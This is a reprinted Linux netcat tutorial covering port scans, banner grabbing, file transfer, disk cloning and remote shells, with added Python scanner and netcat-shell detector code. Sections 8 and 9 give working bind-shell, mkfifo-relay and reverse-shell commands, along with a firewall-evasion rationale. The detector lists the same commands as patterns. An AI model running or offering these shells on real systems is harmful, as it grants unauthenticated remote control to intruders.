Linux netcat commands

Source: Internet
Author: User
Tags: decrypt, mcrypt

Netcat is the Swiss Army knife of network tools: it reads and writes data across TCP and UDP connections. Combined with pipes, redirection and other tools, it can be used in scripts in a great many ways. It is remarkable what you can do with the netcat command.

What netcat does is open a connection between two computers and hand you the two data streams; what you do with them afterwards is up to your imagination. You can build a server, transfer files, chat with a friend, stream media, or use it as a standalone client for other protocols.

Here are some examples of using netcat.

Two machines are used throughout: A (172.31.100.7) and B (172.31.100.23).

1. Port Scanning

Port scanning is done by system administrators and attackers alike to find the open ports on a machine; the open ports tell them which services are exposed and therefore where to look for vulnerabilities.

$ nc -z -v -n 172.31.100.7 21-25

netcat works in both TCP and UDP mode. The default is TCP; the -u option switches to UDP.

The -z option tells netcat to use zero I/O: each connection is closed as soon as it opens and no actual data is exchanged.
The -v option enables verbose output.
The -n option tells netcat not to do DNS lookups for the address.

This command reports which of the ports from 21 to 25 are open. A UDP scan with -u is far less reliable: a UDP port that never answers looks the same as an open one, so netcat reports it open unless an ICMP port-unreachable message comes back.

A banner is the text a service sends when you connect to it. Banners are very useful when you are looking for vulnerabilities, since they identify the type and version of the service. Note that not all services send a banner; some wait for the client to speak first. Banners can also be edited or faked by the administrator, so treat the version they advertise as a hint, not proof.
Once you have found the open ports you can grab the service banner by connecting to them with netcat:

$ nc -v 172.31.100.7 21

The netcat command connects to the open port and prints the banner of the service running there.
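The scan and banner grab above, written against plain sockets as an added example that is not part of the original article: scan_ports() does what nc -z does (complete the handshake, then close without sending anything) and grab_banner() shows what nc -v host 21 prints, each with an explicit timeout so a filtered port does not stall the run. The listener started by start_banner_server(), its banner text and the use of 127.0.0.1 are constructed so the example runs offline; reserve_closed_port() is likewise a helper of ours, not a netcat feature.

```python
"""Zero-I/O port scan and banner grab with plain sockets.

Added example, not code from the original article. It mirrors
`nc -z -v -n 172.31.100.7 21-25` and `nc -v 172.31.100.7 21`, with a
per-connection timeout so a filtered port cannot hang the scan.
start_banner_server() is a constructed stand-in for a real service so the
example runs offline; the banner text and 127.0.0.1 are ours.
"""
import socket
import threading


def scan_ports(host, ports, timeout=1.0):
    """Return the ports in `ports` that complete a TCP handshake.

    Like nc -z, nothing is sent: the connection is closed as soon as it
    opens. A refused port fails at once; a filtered port (no SYN/ACK and
    no RST) only gives up after `timeout` seconds.
    """
    open_ports = []
    for port in ports:
        try:
            with socket.create_connection((host, port), timeout=timeout):
                open_ports.append(port)
        except OSError:            # ECONNREFUSED, timeout, unreachable
            pass
    return open_ports


def grab_banner(host, port, timeout=2.0, max_bytes=1024):
    """Connect and return whatever the service says before we send anything.

    Returns b"" for a closed port and for a service that waits for the
    client to speak first (the "not all services send a banner" case).
    A service that sends a banner and then keeps the connection open is
    read until `timeout` seconds pass without further data.
    """
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as conn:
            conn.settimeout(timeout)
            while len(data) < max_bytes:
                chunk = conn.recv(max_bytes - len(data))
                if not chunk:      # service closed the connection
                    break
                data += chunk
    except socket.timeout:
        pass                       # quiet service: keep whatever arrived
    except OSError:
        return b""
    return data


def start_banner_server(banner, host="127.0.0.1"):
    """Constructed stand-in for a banner-emitting daemon (an FTP server, say).

    Listens on an ephemeral port, sends `banner` to each connection, and
    returns (port, stop) where stop() shuts the thread down.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((host, 0))
    srv.listen(5)
    port = srv.getsockname()[1]
    stopped = threading.Event()

    def serve():
        srv.settimeout(0.2)
        while not stopped.is_set():
            try:
                conn, _ = srv.accept()
            except socket.timeout:
                continue
            with conn:
                try:
                    conn.sendall(banner)
                except OSError:    # a zero-I/O probe already hung up
                    pass
        srv.close()

    threading.Thread(target=serve, daemon=True).start()
    return port, stopped.set


def reserve_closed_port(host="127.0.0.1"):
    """Constructed helper: a port number nothing is listening on right now."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind((host, 0))
        return s.getsockname()[1]


if __name__ == "__main__":
    port, stop = start_banner_server(b"220 ftp.example.test FTP server ready\r\n")
    closed = reserve_closed_port()
    print("open ports:", scan_ports("127.0.0.1", sorted([closed, port])))
    print("banner:", grab_banner("127.0.0.1", port))
    stop()
```

Run as a script it prints the one open port and its banner. The timeout is the part netcat's one-liner hides: a firewall that drops packets instead of refusing them makes a port look filtered, and without a per-connection limit one such port would stall the whole range.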


2. Chat Server

If you want to chat with a friend, there are numerous messengers and services at your disposal. But what if you no longer have that luxury, for instance in a computer lab where all outside connections are restricted? How do you talk to the friend sitting in the next room? netcat has a solution: create a chat server on an agreed port and let your friend connect to it.

Server

$ nc -l 1567

The netcat command starts a TCP server on port 1567 with stdin and stdout as its input and output streams: whatever arrives from the network is displayed in the shell, and whatever you type in the shell is sent. (Traditional netcat wants the port after -p, as in nc -l -p 1567; the OpenBSD netcat and Nmap's ncat accept nc -l 1567 as written here. The same applies to every listener in this article.)

Client

$ nc 172.31.100.7 1567

After this, whatever you type on machine B appears on A and vice versa. Bear in mind that the text travels in the clear and that the listener accepts the first connection from anyone who can reach the port.

3. File Transfer

Often we need to transfer a file over the network and stumble over which tool to use. There are again numerous methods available, such as FTP, SCP and SMB, but is it really worth installing and configuring such software and setting up a server on your machine when you need to transfer one file, only once?

Suppose we want to transfer a file file.txt from A to B.
Either side can be the server or the client; let's make A the server and B the client.

Server

$ nc -l 1567 < file.txt

Client

$ nc -n 172.31.100.7 1567 > file.txt

Here we have created a server at A and redirected netcat's input from file.txt, so as soon as a connection succeeds netcat sends the contents of the file.

At the client we redirected netcat's output to file.txt. When B connects to A, A sends the file contents and B saves them to file.txt.

It is not necessary for the source of the file to be the server; it works the other way round as well. In the case below the file still goes from A to B, but the server is created at B: netcat's output is redirected to the file at B, and its input is taken from the file at A, which connects as the client.

B as Server

Server

$ nc -l 1567 > file.txt

Client

$ nc 172.31.100.23 1567 < file.txt

Two practical notes. Some netcat versions keep the connection open after the input file is exhausted; if the sender does not exit on its own, add -N (OpenBSD netcat) or -q 1 (traditional netcat) so that it closes the connection at end of input. And netcat offers no integrity or origin check, so compare a checksum of the file on both sides (for example with sha256sum), and remember that the listener accepts whoever connects first.
4. Directory Transfer

Sending one file is easy; if you want to send several files or a whole directory, it is just as easy: use the archive tool tar to bundle the files first and send the archive.

Suppose we want to transfer a directory over the network from A to B.

Server

$ tar -cvf - dir_name | nc -l 1567

Client

$ nc -n 172.31.100.7 1567 | tar -xvf -

Here at server A we create the tar archive and write it to standard output by giving - as the archive name, then pipe it to netcat, which sends it over the network.

At client B we just receive the archive from the server with netcat and pipe it into tar, which reads the archive from standard input (again the -) and extracts the files.

To conserve bandwidth by compressing the archive, we can insert bzip2 or another compressor suited to the content of the files.

Server

$ tar -cvf - dir_name | bzip2 -z | nc -l 1567

Compress the archive with bzip2.

Client

$ nc -n 172.31.100.7 1567 | bzip2 -d | tar -xvf -

Decompress the archive with bzip2 before handing it to tar. Since the receiving tar extracts whatever arrives on the socket, only do this with a sender you trust, and extract into a fresh directory rather than over existing files.


5. Encrypt your data when sending over the network

If you are worried about the security of data sent over the network, you can encrypt it before sending with a tool such as mcrypt. Note that the listening side here is the sender: it encrypts and serves the ciphertext, and the receiving side connects and decrypts.

Sending side (listens and encrypts)

$ mcrypt --flush --bare -F -q -m ecb < file.txt | nc -l 1567

Encrypt file.txt with mcrypt and serve the ciphertext on port 1567.

Receiving side (connects and decrypts)

$ nc localhost 1567 | mcrypt --flush --bare -F -q -d -m ecb > file.txt

Decrypt the received data with mcrypt (-d) and write it to file.txt. localhost only works when both commands run on the same machine; across the network, give the address of the listening machine instead (172.31.100.7 if A is sending).

Both commands prompt for a passphrase; make sure to use the same one on both ends.

Here we have used mcrypt for encryption, but any tool that reads plaintext on standard input and writes ciphertext on standard output fits the same pipeline. Two caveats before copying this: ECB mode turns identical plaintext blocks into identical ciphertext blocks, so it leaks the structure of the file, and nothing here checks integrity, so a stream modified in transit decrypts silently into garbage. mcrypt itself has been unmaintained for years. For the same pipeline today, prefer a tool that does authenticated encryption with a passphrase, such as age -p or gpg --symmetric.


6. Stream a video

Not the best way to stream video, but if the server lacks dedicated tools, netcat still gives us a way.

Server

$ cat video.avi | nc -l 1567

Here we just read the video file and pipe it to netcat.

Client

$ nc 172.31.100.7 1567 | mplayer -vo x11 -cache 3000 -

Here we read the data from the socket and pipe it into mplayer, which plays from standard input (the trailing -). -cache takes a buffer size in kilobytes; 3000 is an example value.


7. Cloning a device

If you have just installed and configured a Linux machine and need to do the same on another machine, there is no need to repeat the process: boot the other machine from a bootable pen drive and clone the first one onto it.

Cloning a Linux PC is very simple. Suppose your system disk is /dev/sda.

Server

$ dd if=/dev/sda | nc -l 1567

Client

$ nc -n 172.31.100.7 1567 | dd of=/dev/sda

dd reads the raw data from the disk; we just pipe its output through a netcat server to the other machine and write it to the disk there. This copies everything, partition table included. If the partitioning is already done and only the root partition needs to move, replace sda with sda1, sda2 and so on, depending on where the root filesystem is installed. A few things to check before running this: the target disk must be at least as large as the source; neither disk should be mounted while it is being copied, so boot both machines from live media (imaging a running system gives an inconsistent copy); and the clone inherits everything on the disk, including the host name, SSH host keys and other machine identifiers, which you will want to change on the copy.


8. Opening a shell

We have used remote shells through telnet and ssh, but what if they are not installed and we do not have permission to install them? Then we can create a remote shell with netcat as well.

If your netcat supports the -c and -e options (traditional netcat, and Nmap's ncat):

Server

$ nc -l 1567 -e /bin/bash -i

Client

$ nc 172.31.100.7 1567

Here we have created a netcat server and told it to run /bin/bash once a connection succeeds.

If your netcat does not support -c or -e (OpenBSD netcat), we can still create a remote shell:

Server

$ mkfifo /tmp/tmp_fifo
$ cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo

Here we have created a FIFO (a named pipe). Its contents are piped with cat into a shell; 2>&1 sends the shell's stderr to the same place as its stdout, and both are piped into the netcat server listening on port 1567. Netcat's own output, in turn, is redirected back into the FIFO.

Explanation:

Input received from the network is written to the FIFO.

cat reads the FIFO and passes its contents to sh.

sh processes the input and writes the result to netcat.

netcat sends the output over the network to the client.

This works because a pipeline runs its commands in parallel. A FIFO is used instead of a regular file because a read on a FIFO blocks until data arrives, whereas cat on an ordinary empty file would exit as soon as it started reading.

At the client, it is as simple as connecting to the server:

Client

$ nc -n 172.31.100.7 1567

and you get a shell prompt at the client.

Keep in mind what this is: an unauthenticated, unencrypted shell, run with the privileges of the user who started netcat, handed to whoever reaches the port first. It is exactly what a bind-shell backdoor looks like, so only do this on a network you control and stop the listener as soon as you are done.


9. Reverse Shell

A reverse shell is a shell opened on the client side. It is called "reverse" because, unlike the other setups, here the server uses a service provided by the client.

Server

$ nc -l 1567

At the client side, simply tell netcat to execute the shell once the connection is complete.

Client

$ nc 172.31.100.7 1567 -e /bin/bash

Now, what is so special about a reverse shell?
A reverse shell is often used to get around firewall restrictions such as blocked inbound connections. For example, suppose my machine has the private address 172.31.100.7 and reaches the outside network only through a proxy, so nothing outside can connect in. If I want a shell on this machine from an outside host, say 1.2.3.4, I run the listener on 1.2.3.4 and have 172.31.100.7 connect out to it with -e /bin/bash: the connection is outbound, which the firewall allows, yet the shell ends up at the listener. The same caveats as for the bind shell apply: the listener cannot tell who connected, and everything passes in the clear.
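The bind shell of section 8 and the reverse shell of section 9 have a recognisable shape from the defender's side as well. The following added example, not part of the original article, classifies command lines from a process listing: a netcat given -e or -c (or ncat's --exec/--sh-exec) pointing at a shell is a bind shell if it is also listening and a reverse shell otherwise, a wrapper sh -c "..." is unwrapped first, and the mkfifo relay from section 8 is recognised when it appears as a single command line. PROCESS_LISTING is constructed to look like ps -eo pid,user,args output; the PIDs, user names and addresses in it are made up, and NETCAT_NAMES, SHELL_NAMES, classify() and scan_listing() are names of ours.

```python
"""Flag netcat bind and reverse shells in a process listing.

Added example, not part of the original article. PROCESS_LISTING is
constructed to look like `ps -eo pid,user,args` output; nothing in it
was captured from a real host.
"""
import re
import shlex

NETCAT_NAMES = {"nc", "ncat", "netcat", "nc.traditional", "nc.openbsd"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}
EXEC_FLAGS = {"-e", "-c", "--exec", "--sh-exec"}   # -c/--sh-exec run via sh

_PS_LINE = re.compile(r"^\s*(\d+)\s+(\S+)\s+(.+?)\s*$")
_NC_RE = re.compile(r"(?:^|[\s|;&(/])(?:nc|ncat|netcat)(?=\s|$)")
_INTERACTIVE_SH_RE = re.compile(r"(?:^|[\s/])(?:sh|bash|dash)\s+-i(?=\s|$)")

PROCESS_LISTING = """\
  PID USER     COMMAND
    1 root     /sbin/init
  842 root     /usr/sbin/sshd -D
 1301 www-data nc -l 1567 -e /bin/bash -i
 1355 alice    nc 172.31.100.7 1567 -e /bin/bash
 1402 bob      sh -c mkfifo /tmp/tmp_fifo; cat /tmp/tmp_fifo | /bin/sh -i 2>&1 | nc -l 1567 > /tmp/tmp_fifo
 1477 alice    nc -z -v -n 172.31.100.7 21-25
 1520 root     ncat --ssl -l 1567
 1599 carol    ncat -lvp 4444 --sh-exec /bin/bash
 1644 dave     bash -c nc 10.0.0.5 4444 -e /bin/sh
"""


def _basename(path):
    return path.rsplit("/", 1)[-1]


def _exec_target(argv):
    """Return the program netcat was told to run if it is a shell, else None."""
    for i, arg in enumerate(argv):
        if arg in EXEC_FLAGS:
            cand = argv[i + 1] if i + 1 < len(argv) else ""
        elif arg.startswith("-e/"):                 # glued form: -e/bin/sh
            cand = arg[2:]
        elif arg.startswith(("--exec=", "--sh-exec=")):
            cand = arg.split("=", 1)[1]
        else:
            continue
        words = cand.split()
        if words and _basename(words[0]) in SHELL_NAMES:
            return cand
    return None


def _is_listening(argv):
    """True for -l, --listen, or an -l folded into a cluster such as -lvp."""
    for arg in argv[1:]:
        if arg == "--listen":
            return True
        if arg.startswith("-") and arg[1:].isalpha() and "l" in arg[1:].lower():
            return True
    return False


def classify(cmdline):
    """Return "bind-shell", "reverse-shell", "fifo-shell", "listener" or None.

    Ordinary use such as a port scan returns None; a plain listener is
    reported so an analyst can check what is being served on the port.
    """
    try:
        argv = shlex.split(cmdline)
    except ValueError:                  # unbalanced quotes: fall back to whitespace
        argv = cmdline.split()
    if not argv:
        return None
    prog = _basename(argv[0])

    # Wrapper shell: ps flattens `sh -c "<script>"` into words, so rejoin
    # everything after -c and classify the script itself.
    if prog in SHELL_NAMES and "-c" in argv[1:]:
        script = " ".join(argv[argv.index("-c") + 1:])
        return classify(script) if script else None

    if prog in NETCAT_NAMES:
        if _exec_target(argv):
            return "bind-shell" if _is_listening(argv) else "reverse-shell"
        return "listener" if _is_listening(argv) else None

    # The section 8 FIFO relay: an interactive shell and netcat in one pipeline.
    if _NC_RE.search(cmdline) and _INTERACTIVE_SH_RE.search(cmdline):
        return "fifo-shell"
    return None


def scan_listing(listing):
    """Parse ps-style lines and return the processes worth a closer look."""
    flagged = []
    for line in listing.splitlines():
        m = _PS_LINE.match(line)
        if not m:                       # header line or blank
            continue
        pid, user, cmd = m.groups()
        verdict = classify(cmd)
        if verdict:
            flagged.append({"pid": int(pid), "user": user, "verdict": verdict, "cmd": cmd})
    return flagged


if __name__ == "__main__":
    for hit in scan_listing(PROCESS_LISTING):
        print(f"{hit['pid']:>6} {hit['user']:<9} {hit['verdict']:<14} {hit['cmd']}")
```

A plain nc -l is reported as a listener rather than ignored, because a file-transfer listener and a bind shell look the same until you see what is attached to the port; the port scan from section 1 is not reported at all. The rules only look at argument strings, so a renamed binary, or the three-process form of the FIFO relay where cat, sh and nc are separate entries, needs process-tree or socket data that a single ps line does not carry.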


Reprint: https://www.oschina.net/translate/linux-netcat-command?cmp
